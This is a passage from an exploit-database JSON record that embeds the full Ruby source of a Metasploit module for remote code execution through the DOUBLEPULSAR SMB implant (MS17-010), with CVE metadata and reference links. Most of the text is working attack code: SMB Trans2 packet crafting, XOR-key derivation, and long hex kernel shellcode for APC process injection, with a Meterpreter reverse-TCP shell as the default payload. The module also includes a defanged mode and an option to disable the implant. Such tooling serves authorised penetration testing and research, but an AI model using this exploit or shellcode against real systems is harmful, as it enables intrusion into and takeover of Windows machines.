\"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" 
\\\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\n 
\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/smb_doublepulsar_rce.rb", "title": "SMB DOUBLEPULSAR Remote Code Execution", "type": "metasploit", "viewCount": 115}, "differentElements": ["published"], "edition": 69, "lastseen": "2020-07-12T16:01:04"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. 
While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "enchantments": {"dependencies": {"modified": "2020-06-23T07:32:07", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", 
"CVE-2017-0145"], "type": "cve"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", 
"SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-06-23T07:32:07", "rev": 2, "value": 7.8, "vector": "NONE"}}, "hash": "b9e474fffe92441ab5fb7c9462a227a4", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "lastseen": "2020-06-23T07:32:07", "metasploitHistory": "", "metasploitReliability": "", "modified": "1976-01-01T00:00:00", "objectVersion": "1.4", "published": "1976-01-01T00:00:00", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Module::Deprecated\n\n 
moved_from 'exploit/windows/smb/doublepulsar_rce'\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload (x64)',\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n ],\n ['Neutralize implant',\n 'DefaultOptions' 
=> {\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_OS_DOWN],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }.freeze\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }.freeze\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? 
ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack1('V')\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n print_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n print_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n print_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload (x64)'\n unless @xor_key\n fail_with(Failure::NotFound, 
'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n 
return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack('S<')\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from 
external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" 
\\\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\n 